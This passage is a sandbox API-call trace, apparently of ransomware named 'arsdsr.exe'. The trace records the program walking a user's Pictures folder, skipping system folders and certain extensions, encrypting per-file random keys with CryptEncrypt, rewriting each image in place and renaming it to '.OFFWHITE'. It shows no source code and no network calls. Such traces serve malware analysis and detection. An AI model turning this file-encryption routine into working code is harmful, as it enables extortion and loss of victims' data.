halpmcxz\\pictures\\hpdfcmjzlwuniow.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.828] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=13668) returned 1 [0135.828] GetProcessHeap () returned 0x500000 [0135.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.828] GetProcessHeap () returned 0x500000 [0135.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.828] GetProcessHeap () returned 0x500000 [0135.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.828] GetProcessHeap () returned 0x500000 [0135.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.828] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.828] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.828] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.828] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.828] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.828] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.828] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.829] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.829] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.829] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.829] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3564, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.829] SetLastError (dwErrCode=0x0) [0135.829] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.831] GetLastError () returned 0x0 [0135.831] GetLastError () returned 0x0 [0135.831] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3664, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.831] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.832] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3764, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.832] WriteFile (in: hFile=0xb0, lpBuffer=0x521f50*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521f50*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.832] GetProcessHeap () returned 0x500000 [0135.832] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3564) returned 0x55a7b8 [0135.832] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.832] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x3564, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x3564, lpOverlapped=0x0) returned 1 [0135.833] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.834] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x3564, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x3564, lpOverlapped=0x0) returned 1 [0135.834] GetProcessHeap () returned 0x500000 [0135.834] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.834] CloseHandle (hObject=0xb0) returned 1 [0135.838] GetProcessHeap () returned 0x500000 [0135.838] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.838] GetProcessHeap () returned 0x500000 [0135.838] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.839] GetProcessHeap () returned 0x500000 [0135.839] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.839] GetProcessHeap () returned 0x500000 [0135.839] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.839] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif" [0135.839] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif.OFFWHITE" [0135.839] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hpdfcmjzlwuniow.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hpdfcmjzlwuniow.gif.offwhite")) returned 1 [0135.840] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd76958a0, ftCreationTime.dwHighDateTime=0x1d5d8c5, ftLastAccessTime.dwLowDateTime=0x6f9a35b0, ftLastAccessTime.dwHighDateTime=0x1d5dcbb, ftLastWriteTime.dwLowDateTime=0x6f9a35b0, ftLastWriteTime.dwHighDateTime=0x1d5dcbb, nFileSizeHigh=0x0, nFileSizeLow=0x6718, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="k39VO.png", cAlternateFileName="")) returned 1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2=".") returned 1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="..") returned 1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="...") returned 1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="windows") returned -1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="$recycle.bin") returned 1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="rsa") returned -1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="ntuser.dat") returned -1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="programdata") returned -1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="appdata") returned 1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="program files") returned -1 [0135.840] lstrcmpiW (lpString1="k39VO.png", lpString2="program files (x86)") returned -1 [0135.840] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.840] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="k39VO.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png" [0135.840] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.840] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.840] PathFindExtensionW (pszPath="k39VO.png") returned=".png" [0135.840] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.840] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.840] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.840] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.840] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.840] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.841] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.841] lstrcmpiW (lpString1="k39VO.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.841] GetProcessHeap () returned 0x500000 [0135.841] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f60 [0135.841] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k39vo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.841] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=26392) returned 1 [0135.841] GetProcessHeap () returned 0x500000 [0135.841] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.842] GetProcessHeap () returned 0x500000 [0135.842] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.842] GetProcessHeap () returned 0x500000 [0135.842] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.842] GetProcessHeap () returned 0x500000 [0135.842] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.842] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.842] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.842] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.842] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.843] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6718, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.843] SetLastError (dwErrCode=0x0) [0135.843] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.845] GetLastError () returned 0x0 [0135.845] GetLastError () returned 0x0 [0135.845] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6818, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.845] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.845] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6918, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.845] WriteFile (in: hFile=0xb0, lpBuffer=0x521f60*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521f60*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.845] GetProcessHeap () returned 0x500000 [0135.846] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6718) returned 0x55a7b8 [0135.846] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.846] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x6718, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x6718, lpOverlapped=0x0) returned 1 [0135.848] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.848] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x6718, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x6718, lpOverlapped=0x0) returned 1 [0135.848] GetProcessHeap () returned 0x500000 [0135.848] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.848] CloseHandle (hObject=0xb0) returned 1 [0135.850] GetProcessHeap () returned 0x500000 [0135.850] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.850] GetProcessHeap () returned 0x500000 [0135.850] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.850] GetProcessHeap () returned 0x500000 [0135.850] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.850] GetProcessHeap () returned 0x500000 [0135.850] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.850] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png" [0135.850] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png.OFFWHITE" [0135.850] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k39vo.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k39VO.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k39vo.png.offwhite")) returned 1 [0135.851] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa79d9cc0, ftCreationTime.dwHighDateTime=0x1d5df5b, ftLastAccessTime.dwLowDateTime=0x19475b20, ftLastAccessTime.dwHighDateTime=0x1d5d8d8, ftLastWriteTime.dwLowDateTime=0x19475b20, ftLastWriteTime.dwHighDateTime=0x1d5d8d8, nFileSizeHigh=0x0, nFileSizeLow=0x13701, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="LIl1rW-b1p8kKK9RqLv.gif", cAlternateFileName="LIL1RW~1.GIF")) returned 1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2=".") returned 1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="..") returned 1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="...") returned 1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="windows") returned -1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="$recycle.bin") returned 1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="rsa") returned -1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="ntuser.dat") returned -1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="programdata") returned -1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="appdata") returned 1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="program files") returned -1 [0135.851] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="program files (x86)") returned -1 [0135.851] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.851] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="LIl1rW-b1p8kKK9RqLv.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif" [0135.851] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.851] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.851] PathFindExtensionW (pszPath="LIl1rW-b1p8kKK9RqLv.gif") returned=".gif" [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.852] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.852] lstrcmpiW (lpString1="LIl1rW-b1p8kKK9RqLv.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.852] GetProcessHeap () returned 0x500000 [0135.852] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f70 [0135.852] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lil1rw-b1p8kkk9rqlv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.853] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=79617) returned 1 [0135.853] GetProcessHeap () returned 0x500000 [0135.853] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.853] GetProcessHeap () returned 0x500000 [0135.853] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.853] GetProcessHeap () returned 0x500000 [0135.853] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.853] GetProcessHeap () returned 0x500000 [0135.853] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.853] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.853] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.853] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.853] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.853] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.853] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.853] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.853] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.853] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.854] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.854] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.854] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.854] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13701, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.854] SetLastError (dwErrCode=0x0) [0135.854] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.856] GetLastError () returned 0x0 [0135.856] GetLastError () returned 0x0 [0135.856] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13801, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.856] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.856] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13901, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.856] WriteFile (in: hFile=0xb0, lpBuffer=0x521f70*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521f70*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.856] GetProcessHeap () returned 0x500000 [0135.856] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x13701) returned 0x55a7b8 [0135.856] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.857] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x13701, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x13701, lpOverlapped=0x0) returned 1 [0135.862] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.862] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x13701, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x13701, lpOverlapped=0x0) returned 1 [0135.863] GetProcessHeap () returned 0x500000 [0135.863] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.863] CloseHandle (hObject=0xb0) returned 1 [0135.864] GetProcessHeap () returned 0x500000 [0135.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.865] GetProcessHeap () returned 0x500000 [0135.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.865] GetProcessHeap () returned 0x500000 [0135.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.865] GetProcessHeap () returned 0x500000 [0135.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.865] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif" [0135.865] lstrcatW (in: 